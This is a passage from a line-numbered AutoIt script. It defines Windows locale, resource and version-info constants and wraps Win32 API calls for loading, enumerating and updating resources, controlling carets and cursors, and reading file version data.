  3541. Global Const $locale_sabbrevdayname7 = 55
  3542. Global Const $locale_smonthname1 = 56
  3543. Global Const $locale_smonthname2 = 57
  3544. Global Const $locale_smonthname3 = 58
  3545. Global Const $locale_smonthname4 = 59
  3546. Global Const $locale_smonthname5 = 60
  3547. Global Const $locale_smonthname6 = 61
  3548. Global Const $locale_smonthname7 = 62
  3549. Global Const $locale_smonthname8 = 63
  3550. Global Const $locale_smonthname9 = 64
  3551. Global Const $locale_smonthname10 = 65
  3552. Global Const $locale_smonthname11 = 66
  3553. Global Const $locale_smonthname12 = 67
  3554. Global Const $locale_smonthname13 = 4110
  3555. Global Const $locale_sabbrevmonthname1 = 68
  3556. Global Const $locale_sabbrevmonthname2 = 69
  3557. Global Const $locale_sabbrevmonthname3 = 70
  3558. Global Const $locale_sabbrevmonthname4 = 71
  3559. Global Const $locale_sabbrevmonthname5 = 72
  3560. Global Const $locale_sabbrevmonthname6 = 73
  3561. Global Const $locale_sabbrevmonthname7 = 74
  3562. Global Const $locale_sabbrevmonthname8 = 75
  3563. Global Const $locale_sabbrevmonthname9 = 76
  3564. Global Const $locale_sabbrevmonthname10 = 77
  3565. Global Const $locale_sabbrevmonthname11 = 78
  3566. Global Const $locale_sabbrevmonthname12 = 79
  3567. Global Const $locale_sabbrevmonthname13 = 4111
  3568. Global Const $locale_spositivesign = 80
  3569. Global Const $locale_snegativesign = 81
  3570. Global Const $locale_ipossignposn = 82
  3571. Global Const $locale_inegsignposn = 83
  3572. Global Const $locale_ipossymprecedes = 84
  3573. Global Const $locale_ipossepbyspace = 85
  3574. Global Const $locale_inegsymprecedes = 86
  3575. Global Const $locale_inegsepbyspace = 87
  3576. Global Const $locale_fontsignature = 88
  3577. Global Const $locale_siso639langname = 89
  3578. Global Const $locale_siso3166ctryname = 90
  3579. Global Const $locale_idefaultebcdiccodepage = 4114
  3580. Global Const $locale_ipapersize = 4106
  3581. Global Const $locale_sengcurrname = 4103
  3582. Global Const $locale_snativecurrname = 4104
  3583. Global Const $locale_syearmonth = 4102
  3584. Global Const $locale_ssortname = 4115
  3585. Global Const $locale_idigitsubstitution = 4116
  3586. Global Const $locale_custom_default = 3072
  3587. Global Const $locale_custom_ui_default = 5120
  3588. Global Const $locale_custom_unspecified = 4096
  3589. Global Const $locale_invariant = 127
  3590. Global Const $locale_system_default = 2048
  3591. Global Const $locale_user_default = 1024
  3592. Global Const $time_force24hourformat = 8
  3593. Global Const $time_nominutesorseconds = 1
  3594. Global Const $time_noseconds = 2
  3595. Global Const $time_notimemarker = 4
  3596. Global Const $lcid_installed = 1
  3597. Global Const $lcid_supported = 2
  3598. Global Const $rt_accelerator = 9
  3599. Global Const $rt_anicursor = 21
  3600. Global Const $rt_aniicon = 22
  3601. Global Const $rt_bitmap = 2
  3602. Global Const $rt_cursor = 1
  3603. Global Const $rt_dialog = 5
  3604. Global Const $rt_dlginclude = 17
  3605. Global Const $rt_font = 8
  3606. Global Const $rt_fontdir = 7
  3607. Global Const $rt_group_cursor = 12
  3608. Global Const $rt_group_icon = 14
  3609. Global Const $rt_html = 23
  3610. Global Const $rt_icon = 3
  3611. Global Const $rt_manifest = 24
  3612. Global Const $rt_menu = 4
  3613. Global Const $rt_messagetable = 11
  3614. Global Const $rt_plugplay = 19
  3615. Global Const $rt_rcdata = 10
  3616. Global Const $rt_string = 6
  3617. Global Const $rt_version = 16
  3618. Global Const $rt_vxd = 20
  3619. Global Const $file_ver_get_localised = 1
  3620. Global Const $file_ver_get_neutral = 2
  3621. Global Const $file_ver_get_prefetched = 4
  3622. Global Const $obm_trtype = 32732
  3623. Global Const $obm_lfarrowi = 32734
  3624. Global Const $obm_rgarrowi = 32735
  3625. Global Const $obm_dnarrowi = 32736
  3626. Global Const $obm_uparrowi = 32737
  3627. Global Const $obm_combo = 32738
  3628. Global Const $obm_mnarrow = 32739
  3629. Global Const $obm_lfarrowd = 32740
  3630. Global Const $obm_rgarrowd = 32741
  3631. Global Const $obm_dnarrowd = 32742
  3632. Global Const $obm_uparrowd = 32743
  3633. Global Const $obm_restored = 32744
  3634. Global Const $obm_zoomd = 32745
  3635. Global Const $obm_reduced = 32746
  3636. Global Const $obm_restore = 32747
  3637. Global Const $obm_zoom = 32748
  3638. Global Const $obm_reduce = 32749
  3639. Global Const $obm_lfarrow = 32750
  3640. Global Const $obm_rgarrow = 32751
  3641. Global Const $obm_dnarrow = 32752
  3642. Global Const $obm_uparrow = 32753
  3643. Global Const $obm_close = 32754
  3644. Global Const $obm_old_restore = 32755
  3645. Global Const $obm_old_zoom = 32756
  3646. Global Const $obm_old_reduce = 32757
  3647. Global Const $obm_btncorners = 32758
  3648. Global Const $obm_checkboxes = 32759
  3649. Global Const $obm_check = 32760
  3650. Global Const $obm_btsize = 32761
  3651. Global Const $obm_old_lfarrow = 32762
  3652. Global Const $obm_old_rgarrow = 32763
  3653. Global Const $obm_old_dnarrow = 32764
  3654. Global Const $obm_old_uparrow = 32765
  3655. Global Const $obm_size = 32766
  3656. Global Const $obm_old_close = 32767
  3657. Global Const $oic_sample = 32512
  3658. Global Const $oic_hand = 32513
  3659. Global Const $oic_ques = 32514
  3660. Global Const $oic_bang = 32515
  3661. Global Const $oic_note = 32516
  3662. Global Const $oic_winlogo = 32517
  3663. Global Const $oic_warning = $oic_bang
  3664. Global Const $oic_error = $oic_hand
  3665. Global Const $oic_information = $oic_note
  3666. Global Const $dont_resolve_dll_references = 1
  3667. Global Const $load_library_as_datafile = 2
  3668. Global Const $load_with_altered_search_path = 8
  3669. Global Const $load_ignore_code_authz_level = 16
  3670. Global Const $load_library_as_datafile_exclusive = 64
  3671. Global Const $load_library_as_image_resource = 32
  3672. Global Const $load_library_search_application_dir = 512
  3673. Global Const $load_library_search_default_dirs = 4096
  3674. Global Const $load_library_search_dll_load_dir = 256
  3675. Global Const $load_library_search_system32 = 2048
  3676. Global Const $load_library_search_user_dirs = 1024
  3677. Global Const $ocr_normal = 32512
  3678. Global Const $ocr_ibeam = 32513
  3679. Global Const $ocr_wait = 32514
  3680. Global Const $ocr_cross = 32515
  3681. Global Const $ocr_up = 32516
  3682. Global Const $ocr_size = 32640
  3683. Global Const $ocr_icon = 32641
  3684. Global Const $ocr_sizenwse = 32642
  3685. Global Const $ocr_sizenesw = 32643
  3686. Global Const $ocr_sizewe = 32644
  3687. Global Const $ocr_sizens = 32645
  3688. Global Const $ocr_sizeall = 32646
  3689. Global Const $ocr_icocur = 32647
  3690. Global Const $ocr_no = 32648
  3691. Global Const $ocr_hand = 32649
  3692. Global Const $ocr_appstarting = 32650
  3693. Global Const $ocr_help = 32651
  3694. Global Const $vs_ff_debug = 1
  3695. Global Const $vs_ff_infoinferred = 16
  3696. Global Const $vs_ff_patched = 4
  3697. Global Const $vs_ff_prerelease = 2
  3698. Global Const $vs_ff_privatebuild = 8
  3699. Global Const $vs_ff_specialbuild = 32
  3700. Global Const $vos_dos = 65536
  3701. Global Const $vos_nt = 262144
  3702. Global Const $vos__windows16 = 1
  3703. Global Const $vos__windows32 = 4
  3704. Global Const $vos_os216 = 131072
  3705. Global Const $vos_os232 = 196608
  3706. Global Const $vos__pm16 = 2
  3707. Global Const $vos__pm32 = 3
  3708. Global Const $vos_unknown = 0
  3709. Global Const $vos_dos_windows16 = 65537
  3710. Global Const $vos_dos_windows32 = 65540
  3711. Global Const $vos_nt_windows32 = 262148
  3712. Global Const $vos_os216_pm16 = 131074
  3713. Global Const $vos_os232_pm32 = 196611
  3714. Global Const $vft_app = 1
  3715. Global Const $vft_dll = 2
  3716. Global Const $vft_drv = 3
  3717. Global Const $vft_font = 4
  3718. Global Const $vft_static_lib = 7
  3719. Global Const $vft_unknown = 0
  3720. Global Const $vft_vxd = 5
  3721. Global Const $vft2_drv_comm = 10
  3722. Global Const $vft2_drv_display = 4
  3723. Global Const $vft2_drv_installable = 8
  3724. Global Const $vft2_drv_keyboard = 2
  3725. Global Const $vft2_drv_language = 3
  3726. Global Const $vft2_drv_mouse = 5
  3727. Global Const $vft2_drv_network = 6
  3728. Global Const $vft2_drv_printer = 1
  3729. Global Const $vft2_drv_sound = 9
  3730. Global Const $vft2_drv_system = 7
  3731. Global Const $vft2_drv_versioned_printer = 12
  3732. Global Const $vft2_unknown = 0
  3733. Global Const $vft2_font_raster = 1
  3734. Global Const $vft2_font_truetype = 3
  3735. Global Const $vft2_font_vector = 2
  3736. #Region Global Variables and Constants
  3737. Global $__g_vval
  3738. Global Const $tagvs_fixedfileinfo = "dword Signature;dword StrucVersion;dword FileVersionMS;dword FileVersionLS;dword ProductVersionMS;dword ProductVersionLS;dword FileFlagsMask;dword FileFlags;dword FileOS;dword FileType;dword FileSubtype;dword FileDateMS;dword FileDateLS"
  3739. #EndRegion Global Variables and Constants
  3740. #Region Functions list
  3741. #EndRegion Functions list
  3742. #Region Public Functions
  3743.  
  3744. Func _winapi_beginupdateresource($sfilepath, $bdelete = False)
  3745. Local $aret = DllCall("kernel32.dll", "handle", "BeginUpdateResourceW", "wstr", $sfilepath, "bool", $bdelete)
  3746. If @error Then Return SetError(@error, @extended, 0)
  3747. Return $aret[0]
  3748. EndFunc
  3749.  
  3750. Func _winapi_clipcursor($trect)
  3751. Local $aret = DllCall("user32.dll", "bool", "ClipCursor", "struct*", $trect)
  3752. If @error Then Return SetError(@error, @extended, False)
  3753. Return $aret[0]
  3754. EndFunc
  3755.  
  3756. Func _winapi_copycursor($hcursor)
  3757. Return _winapi_copyicon($hcursor)
  3758. EndFunc
  3759.  
  3760. Func _winapi_createcaret($hwnd, $hbitmap, $iwidth = 0, $iheight = 0)
  3761. Local $aret = DllCall("user32.dll", "bool", "CreateCaret", "hwnd", $hwnd, "handle", $hbitmap, "int", $iwidth, "int", $iheight)
  3762. If @error Then Return SetError(@error, @extended, False)
  3763. Return $aret[0]
  3764. EndFunc
  3765.  
  3766. Func _winapi_destroycaret()
  3767. Local $aret = DllCall("user32.dll", "bool", "DestroyCaret")
  3768. If @error Then Return SetError(@error, @extended, 0)
  3769. Return $aret[0]
  3770. EndFunc
  3771.  
  3772. Func _winapi_destroycursor($hcursor)
  3773. Local $aret = DllCall("user32.dll", "bool", "DestroyCursor", "handle", $hcursor)
  3774. If @error Then Return SetError(@error, @extended, 0)
  3775. Return $aret[0]
  3776. EndFunc
  3777.  
  3778. Func _winapi_endupdateresource($hupdate, $bdiscard = False)
  3779. Local $aret = DllCall("kernel32.dll", "bool", "EndUpdateResourceW", "handle", $hupdate, "bool", $bdiscard)
  3780. If @error Then Return SetError(@error, @extended, False)
  3781. Return $aret[0]
  3782. EndFunc
  3783.  
  3784. Func _winapi_enumresourcelanguages($hmodule, $stype, $sname)
  3785. Local $ilibrary = 0, $stypeoftype = "int", $stypeofname = "int"
  3786. If IsString($hmodule) Then
  3787. If StringStripWS($hmodule, $str_stripleading + $str_striptrailing) Then
  3788. $hmodule = _winapi_loadlibraryex($hmodule, 3)
  3789. If NOT $hmodule Then Return SetError(1, 0, 0)
  3790. $ilibrary = 1
  3791. Else
  3792. $hmodule = 0
  3793. EndIf
  3794. EndIf
  3795. If IsString($stype) Then
  3796. $stypeoftype = "wstr"
  3797. EndIf
  3798. If IsString($sname) Then
  3799. $stypeofname = "wstr"
  3800. EndIf
  3801. Dim $__g_venum[101] = [0]
  3802. Local $henumproc = DllCallbackRegister("__EnumResLanguagesProc", "bool", "handle;ptr;ptr;word;long_ptr")
  3803. Local $aret = DllCall("kernel32.dll", "bool", "EnumResourceLanguagesW", "handle", $hmodule, $stypeoftype, $stype, $stypeofname, $sname, "ptr", DllCallbackGetPtr($henumproc), "long_ptr", 0)
  3804. If @error OR NOT $aret[0] OR NOT $__g_venum[0] Then
  3805. $__g_venum = @error + 10
  3806. EndIf
  3807. If $ilibrary Then
  3808. _winapi_freelibrary($hmodule)
  3809. EndIf
  3810. DllCallbackFree($henumproc)
  3811. If $__g_venum Then Return SetError($__g_venum, 0, 0)
  3812. __inc($__g_venum, -1)
  3813. Return $__g_venum
  3814. EndFunc
  3815.  
  3816. Func _winapi_enumresourcenames($hmodule, $stype)
  3817. Local $aret, $henumproc, $ilibrary = 0, $stypeoftype = "int"
  3818. If IsString($hmodule) Then
  3819. If StringStripWS($hmodule, $str_stripleading + $str_striptrailing) Then
  3820. $hmodule = _winapi_loadlibraryex($hmodule, 3)
  3821. If NOT $hmodule Then Return SetError(1, 0, 0)
  3822. $ilibrary = 1
  3823. Else
  3824. $hmodule = 0
  3825. EndIf
  3826. EndIf
  3827. If IsString($stype) Then
  3828. $stypeoftype = "wstr"
  3829. EndIf
  3830. Dim $__g_venum[101] = [0]
  3831. $henumproc = DllCallbackRegister("__EnumResNamesProc", "bool", "handle;ptr;ptr;long_ptr")
  3832. $aret = DllCall("kernel32.dll", "bool", "EnumResourceNamesW", "handle", $hmodule, $stypeoftype, $stype, "ptr", DllCallbackGetPtr($henumproc), "long_ptr", 0)
  3833. If @error OR NOT $aret[0] OR (NOT $__g_venum[0]) Then
  3834. $__g_venum = @error + 10
  3835. EndIf
  3836. If $ilibrary Then
  3837. _winapi_freelibrary($hmodule)
  3838. EndIf
  3839. DllCallbackFree($henumproc)
  3840. If $__g_venum Then Return SetError($__g_venum, 0, 0)
  3841. __inc($__g_venum, -1)
  3842. Return $__g_venum
  3843. EndFunc
  3844.  
  3845. Func _winapi_enumresourcetypes($hmodule)
  3846. Local $ilibrary = 0
  3847. If IsString($hmodule) Then
  3848. If StringStripWS($hmodule, $str_stripleading + $str_striptrailing) Then
  3849. $hmodule = _winapi_loadlibraryex($hmodule, 3)
  3850. If NOT $hmodule Then Return SetError(1, 0, 0)
  3851. $ilibrary = 1
  3852. Else
  3853. $hmodule = 0
  3854. EndIf
  3855. EndIf
  3856. Dim $__g_venum[101] = [0]
  3857. Local $henumproc = DllCallbackRegister("__EnumResTypesProc", "bool", "handle;ptr;long_ptr")
  3858. Local $aret = DllCall("kernel32.dll", "bool", "EnumResourceTypesW", "handle", $hmodule, "ptr", DllCallbackGetPtr($henumproc), "long_ptr", 0)
  3859. If @error OR NOT $aret[0] OR (NOT $__g_venum[0]) Then
  3860. $__g_venum = @error + 10
  3861. EndIf
  3862. If $ilibrary Then
  3863. _winapi_freelibrary($hmodule)
  3864. EndIf
  3865. DllCallbackFree($henumproc)
  3866. If $__g_venum Then Return SetError($__g_venum, 0, 0)
  3867. __inc($__g_venum, -1)
  3868. Return $__g_venum
  3869. EndFunc
  3870.  
  3871. Func _winapi_findresource($hinstance, $stype, $sname)
  3872. Local $stypeoftype = "int", $stypeofname = "int"
  3873. If IsString($stype) Then
  3874. $stypeoftype = "wstr"
  3875. EndIf
  3876. If IsString($sname) Then
  3877. $stypeofname = "wstr"
  3878. EndIf
  3879. Local $aret = DllCall("kernel32.dll", "handle", "FindResourceW", "handle", $hinstance, $stypeofname, $sname, $stypeoftype, $stype)
  3880. If @error Then Return SetError(@error, @extended, 0)
  3881. Return $aret[0]
  3882. EndFunc
  3883.  
  3884. Func _winapi_findresourceex($hinstance, $stype, $sname, $ilanguage)
  3885. Local $stypeoftype = "int", $stypeofname = "int"
  3886. If IsString($stype) Then
  3887. $stypeoftype = "wstr"
  3888. EndIf
  3889. If IsString($sname) Then
  3890. $stypeofname = "wstr"
  3891. EndIf
  3892. Local $aret = DllCall("kernel32.dll", "handle", "FindResourceExW", "handle", $hinstance, $stypeoftype, $stype, $stypeofname, $sname, "ushort", $ilanguage)
  3893. If @error Then Return SetError(@error, @extended, 0)
  3894. Return $aret[0]
  3895. EndFunc
  3896.  
  3897. Func _winapi_freeresource($hdata)
  3898. Local $aret = DllCall("kernel32.dll", "bool", "FreeResource", "handle", $hdata)
  3899. If @error Then Return SetError(@error, @extended, False)
  3900. Return $aret[0]
  3901. EndFunc
  3902.  
  3903. Func _winapi_getcaretblinktime()
  3904. Local $aret = DllCall("user32.dll", "uint", "GetCaretBlinkTime")
  3905. If @error Then Return SetError(@error, @extended, 0)
  3906. Return $aret[0]
  3907. EndFunc
  3908.  
  3909. Func _winapi_getcaretpos()
  3910. Local $tpoint = DllStructCreate($tagpoint)
  3911. Local $aret = DllCall("user32.dll", "bool", "GetCaretPos", "struct*", $tagpoint)
  3912. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  3913. Local $aresult[2]
  3914. For $i = 0 To 1
  3915. $aresult[$i] = DllStructGetData($tpoint, $i + 1)
  3916. Next
  3917. Return $aresult
  3918. EndFunc
  3919.  
  3920. Func _winapi_getclipcursor()
  3921. Local $trect = DllStructCreate($tagrect)
  3922. Local $aret = DllCall("user32.dll", "bool", "GetClipCursor", "struct*", $trect)
  3923. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  3924. Return $trect
  3925. EndFunc
  3926.  
  3927. Func _winapi_getcursor()
  3928. Local $aret = DllCall("user32.dll", "handle", "GetCursor")
  3929. If @error Then Return SetError(@error, @extended, 0)
  3930. Return $aret[0]
  3931. EndFunc
  3932.  
  3933. Func _winapi_getfileversioninfo($sfilepath, ByRef $pbuffer, $iflags = 0)
  3934. Local $aret
  3935. If $__winver >= 1536 Then
  3936. $aret = DllCall("version.dll", "dword", "GetFileVersionInfoSizeExW", "dword", BitAND($iflags, 3), "wstr", $sfilepath, "ptr", 0)
  3937. Else
  3938. $aret = DllCall("version.dll", "dword", "GetFileVersionInfoSizeW", "wstr", $sfilepath, "ptr", 0)
  3939. EndIf
  3940. If @error OR NOT $aret[0] Then Return SetError(@error, @extended, 0)
  3941. $pbuffer = __heaprealloc($pbuffer, $aret[0], 1)
  3942. If @error Then Return SetError(@error + 100, @extended, 0)
  3943. Local $inbbyte = $aret[0]
  3944. If $__winver >= 1536 Then
  3945. $aret = DllCall("version.dll", "bool", "GetFileVersionInfoExW", "dword", BitAND($iflags, 7), "wstr", $sfilepath, "dword", 0, "dword", $inbbyte, "ptr", $pbuffer)
  3946. Else
  3947. $aret = DllCall("version.dll", "bool", "GetFileVersionInfoW", "wstr", $sfilepath, "dword", 0, "dword", $inbbyte, "ptr", $pbuffer)
  3948. EndIf
  3949. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  3950. Return $inbbyte
  3951. EndFunc
  3952.  
  3953. Func _winapi_hidecaret($hwnd)
  3954. Local $aret = DllCall("user32.dll", "int", "HideCaret", "hwnd", $hwnd)
  3955. If @error Then Return SetError(@error, @extended, False)
  3956. Return $aret[0]
  3957. EndFunc
  3958.  
  3959. Func _winapi_loadbitmap($hinstance, $sbitmap)
  3960. Local $sbitmaptype = "int"
  3961. If IsString($sbitmap) Then $sbitmaptype = "wstr"
  3962. Local $aresult = DllCall("user32.dll", "handle", "LoadBitmapW", "handle", $hinstance, $sbitmaptype, $sbitmap)
  3963. If @error Then Return SetError(@error, @extended, 0)
  3964. Return $aresult[0]
  3965. EndFunc
  3966.  
  3967. Func _winapi_loadcursor($hinstance, $sname)
  3968. Local $stypeofname = "int"
  3969. If IsString($sname) Then
  3970. $stypeofname = "wstr"
  3971. EndIf
  3972. Local $aret = DllCall("user32.dll", "handle", "LoadCursorW", "handle", $hinstance, $stypeofname, $sname)
  3973. If @error Then Return SetError(@error, @extended, 0)
  3974. Return $aret[0]
  3975. EndFunc
  3976.  
  3977. Func _winapi_loadcursorfromfile($sfilepath)
  3978. Local $aret = DllCall("user32.dll", "handle", "LoadCursorFromFileW", "wstr", $sfilepath)
  3979. If @error Then Return SetError(@error, @extended, 0)
  3980. Return $aret[0]
  3981. EndFunc
  3982.  
  3983. Func _winapi_loadindirectstring($sstrin)
  3984. Local $aret = DllCall("shlwapi.dll", "uint", "SHLoadIndirectString", "wstr", $sstrin, "wstr", "", "uint", 4096, "ptr*", 0)
  3985. If @error Then Return SetError(@error, @extended, "")
  3986. If $aret[0] Then Return SetError(10, $aret[0], "")
  3987. Return $aret[2]
  3988. EndFunc
  3989.  
  3990. Func _winapi_loadstring($hinstance, $istringid)
  3991. Local $aresult = DllCall("user32.dll", "int", "LoadStringW", "handle", $hinstance, "uint", $istringid, "wstr", "", "int", 4096)
  3992. If @error OR NOT $aresult[0] Then Return SetError(@error + 10, @extended, "")
  3993. Return SetExtended($aresult[0], $aresult[3])
  3994. EndFunc
  3995.  
  3996. Func _winapi_loadlibraryex($sfilename, $iflags = 0)
  3997. Local $aresult = DllCall("kernel32.dll", "handle", "LoadLibraryExW", "wstr", $sfilename, "ptr", 0, "dword", $iflags)
  3998. If @error Then Return SetError(@error, @extended, 0)
  3999. Return $aresult[0]
  4000. EndFunc
  4001.  
  4002. Func _winapi_loadresource($hinstance, $hresource)
  4003. Local $aret = DllCall("kernel32.dll", "handle", "LoadResource", "handle", $hinstance, "handle", $hresource)
  4004. If @error Then Return SetError(@error, @extended, 0)
  4005. Return $aret[0]
  4006. EndFunc
  4007.  
  4008. Func _winapi_loadstringex($hmodule, $iid, $ilanguage = $locale_user_default)
  4009. Local $ilibrary = 0
  4010. If IsString($hmodule) Then
  4011. If StringStripWS($hmodule, $str_stripleading + $str_striptrailing) Then
  4012. $hmodule = _winapi_loadlibraryex($hmodule, 3)
  4013. If NOT $hmodule Then Return SetError(@error + 20, @extended, "")
  4014. $ilibrary = 1
  4015. Else
  4016. $hmodule = 0
  4017. EndIf
  4018. EndIf
  4019. Local $sresult = ""
  4020. Local $pdata = __resload($hmodule, 6, Floor($iid / 16) + 1, $ilanguage)
  4021. If NOT @error Then
  4022. Local $ioffset = 0
  4023. For $i = 0 To Mod($iid, 16) - 1
  4024. $ioffset += 2 * (DllStructGetData(DllStructCreate("ushort", $pdata + $ioffset), 1) + 1)
  4025. Next
  4026. $sresult = DllStructGetData(DllStructCreate("ushort;wchar[" & DllStructGetData(DllStructCreate("ushort", $pdata + $ioffset), 1) & "]", $pdata + $ioffset), 2)
  4027. If @error Then $sresult = ""
  4028. Else
  4029. Return SetError(10, 0, "")
  4030. EndIf
  4031. If $ilibrary Then
  4032. _winapi_freelibrary($hmodule)
  4033. EndIf
  4034. Return SetError(Number(NOT $sresult), 0, $sresult)
  4035. EndFunc
  4036.  
  4037. Func _winapi_lockresource($hdata)
  4038. Local $aret = DllCall("kernel32.dll", "ptr", "LockResource", "handle", $hdata)
  4039. If @error Then Return SetError(@error, @extended, 0)
  4040. Return $aret[0]
  4041. EndFunc
  4042.  
  4043. Func _winapi_setcaretblinktime($iduration)
  4044. Local $iprev = _winapi_getcaretblinktime()
  4045. If NOT $iprev Then Return SetError(@error + 20, @extended, 0)
  4046. Local $aret = DllCall("user32.dll", "bool", "SetCaretBlinkTime", "uint", $iduration)
  4047. If @error OR NOT $aret[0] Then Return SetError(@error + 10, @extended, 0)
  4048. Return $iprev
  4049. EndFunc
  4050.  
  4051. Func _winapi_setcaretpos($ix, $iy)
  4052. Local $aret = DllCall("user32.dll", "int", "SetCaretPos", "int", $ix, "int", $iy)
  4053. If @error Then Return SetError(@error, @extended, 0)
  4054. Return $aret[0]
  4055. EndFunc
  4056.  
  4057. Func _winapi_setcursor($hcursor)
  4058. Local $aresult = DllCall("user32.dll", "handle", "SetCursor", "handle", $hcursor)
  4059. If @error Then Return SetError(@error, @extended, 0)
  4060. Return $aresult[0]
  4061. EndFunc
  4062.  
  4063. Func _winapi_setsystemcursor($hcursor, $iid, $bcopy = False)
  4064. If $bcopy Then
  4065. $hcursor = _winapi_copycursor($hcursor)
  4066. EndIf
  4067. Local $aret = DllCall("user32.dll", "bool", "SetSystemCursor", "handle", $hcursor, "dword", $iid)
  4068. If @error Then Return SetError(@error, @extended, False)
  4069. Return $aret[0]
  4070. EndFunc
  4071.  
  4072. Func _winapi_showcaret($hwnd)
  4073. Local $aret = DllCall("user32.dll", "bool", "ShowCaret", "hwnd", $hwnd)
  4074. If @error Then Return SetError(@error, @extended, False)
  4075. Return $aret[0]
  4076. EndFunc
  4077.  
  4078. Func _winapi_showcursor($bshow)
  4079. Local $aresult = DllCall("user32.dll", "int", "ShowCursor", "bool", $bshow)
  4080. If @error Then Return SetError(@error, @extended, 0)
  4081. Return $aresult[0]
  4082. EndFunc
  4083.  
  4084. Func _winapi_sizeofresource($hinstance, $hresource)
  4085. Local $aret = DllCall("kernel32.dll", "dword", "SizeofResource", "handle", $hinstance, "handle", $hresource)
  4086. If @error OR NOT $aret[0] Then Return SetError(@error, @extended, 0)
  4087. Return $aret[0]
  4088. EndFunc
  4089.  
  4090. Func _winapi_updateresource($hupdate, $stype, $sname, $ilanguage, $pdata, $isize)
  4091. Local $stypeoftype = "int", $stypeofname = "int"
  4092. If IsString($stype) Then
  4093. $stypeoftype = "wstr"
  4094. EndIf
  4095. If IsString($sname) Then
  4096. $stypeofname = "wstr"
  4097. EndIf
  4098. Local $aret = DllCall("kernel32.dll", "bool", "UpdateResourceW", "handle", $hupdate, $stypeoftype, $stype, $stypeofname, $sname, "word", $ilanguage, "ptr", $pdata, "dword", $isize)
  4099. If @error Then Return SetError(@error, @extended, False)
  4100. Return $aret[0]
  4101. EndFunc
  4102.  
  4103. Func _winapi_verqueryroot($pdata)
  4104. Local $aret = DllCall("version.dll", "bool", "VerQueryValueW", "ptr", $pdata, "wstr", "\", "ptr*", 0, "uint*", 0)
  4105. If @error OR NOT $aret[0] OR NOT $aret[4] Then Return SetError(@error + 10, @extended, 0)
  4106. Local $tvffi = DllStructCreate($tagvs_fixedfileinfo)
  4107. If NOT _winapi_movememory($tvffi, $aret[3], $aret[4]) Then Return SetError(@error + 20, @extended, 0)
  4108. Return $tvffi
  4109. EndFunc
  4110.  
  4111. Func _winapi_verqueryvalue($pdata, $svalues = "")
  4112. $svalues = StringRegExpReplace($svalues, "\A[\s\|]*|[\s\|]*\Z", "")
  4113. If NOT $svalues Then
  4114. $svalues = "Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild"
  4115. EndIf
  4116. $svalues = StringSplit($svalues, "|", $str_nocount)
  4117. Local $aret = DllCall("version.dll", "bool", "VerQueryValueW", "ptr", $pdata, "wstr", "\VarFileInfo\Translation", "ptr*", 0, "uint*", 0)
  4118. If @error OR NOT $aret[0] OR NOT $aret[4] Then Return SetError(@error + 10, 0, 0)
  4119. Local $ilength = Floor($aret[4] / 4)
  4120. Local $tlang = DllStructCreate("dword[" & $ilength & "]", $aret[3])
  4121. If @error Then Return SetError(@error + 20, 0, 0)
  4122. Local $scp, $ainfo[101][UBound($svalues) + 1] = [[0]]
  4123. For $i = 1 To $ilength
  4124. __inc($ainfo)
  4125. $ainfo[$ainfo[0][0]][0] = _winapi_loword(DllStructGetData($tlang, 1, $i))
  4126. $scp = Hex(_winapi_makelong(_winapi_hiword(DllStructGetData($tlang, 1, $i)), _winapi_loword(DllStructGetData($tlang, 1, $i))), 8)
  4127. For $j = 0 To UBound($svalues) - 1
  4128. $aret = DllCall("version.dll", "bool", "VerQueryValueW", "ptr", $pdata, "wstr", "\StringFileInfo\" & $scp & "\" & $svalues[$j], "ptr*", 0, "uint*", 0)
  4129. If NOT @error AND $aret[0] AND $aret[4] Then
  4130. $ainfo[$ainfo[0][0]][$j + 1] = DllStructGetData(DllStructCreate("wchar[" & $aret[4] & "]", $aret[3]), 1)
  4131. Else
  4132. $ainfo[$ainfo[0][0]][$j + 1] = ""
  4133. EndIf
  4134. Next
  4135. Next
  4136. __inc($ainfo, -1)
  4137. Return $ainfo
  4138. EndFunc
  4139.  
  4140. Func _winapi_verqueryvalueex($hmodule, $svalues = "", $ilanguage = 1024)
  4141. $__g_vval = StringRegExpReplace($svalues, "\A[\s\|]*|[\s\|]*\Z", "")
  4142. If NOT $__g_vval Then
  4143. $__g_vval = "Comments|CompanyName|FileDescription|FileVersion|InternalName|LegalCopyright|LegalTrademarks|OriginalFilename|ProductName|ProductVersion|PrivateBuild|SpecialBuild"
  4144. EndIf
  4145. $__g_vval = StringSplit($__g_vval, "|")
  4146. If NOT IsArray($__g_vval) Then Return SetError(1, 0, 0)
  4147. Local $ilibrary = 0
  4148. If IsString($hmodule) Then
  4149. If StringStripWS($hmodule, $str_stripleading + $str_striptrailing) Then
  4150. $hmodule = _winapi_loadlibraryex($hmodule, 3)
  4151. If NOT $hmodule Then
  4152. Return SetError(@error + 10, @extended, 0)
  4153. EndIf
  4154. $ilibrary = 1
  4155. Else
  4156. $hmodule = 0
  4157. EndIf
  4158. EndIf
  4159. Dim $__g_venum[101][$__g_vval[0] + 1] = [[0]]
  4160. Local $henumproc = DllCallbackRegister("__EnumVerValuesProc", "bool", "ptr;ptr;ptr;word;long_ptr")
  4161. Local $aret = DllCall("kernel32.dll", "bool", "EnumResourceLanguagesW", "handle", $hmodule, "int", 16, "int", 1, "ptr", DllCallbackGetPtr($henumproc), "long_ptr", $ilanguage)
  4162. Do
  4163. If @error Then
  4164. $__g_venum = @error + 20
  4165. Else
  4166. If NOT $aret[0] Then
  4167. Switch _winapi_getlasterror()
  4168. Case 0, 15106
  4169. ExitLoop
  4170. Case Else
  4171. $__g_venum = 20
  4172. EndSwitch
  4173. Else
  4174. ExitLoop
  4175. EndIf
  4176. EndIf
  4177. Until 1
  4178. If $ilibrary Then
  4179. _winapi_freelibrary($hmodule)
  4180. EndIf
  4181. DllCallbackFree($henumproc)
  4182. If NOT $__g_venum[0][0] Then $__g_venum = 230
  4183. If $__g_venum Then Return SetError($__g_venum, 0, 0)
  4184. __inc($__g_venum, -1)
  4185. Return $__g_venum
  4186. EndFunc
  4187.  
  4188. #EndRegion Public Functions
  4189. #Region Internal Functions
  4190.  
  4191. Func __enumreslanguagesproc($hmodule, $itype, $iname, $ilanguage, $lparam)
  4192. #forceref $hModule, $iType, $iName, $lParam
  4193. __inc($__g_venum)
  4194. $__g_venum[$__g_venum[0]] = $ilanguage
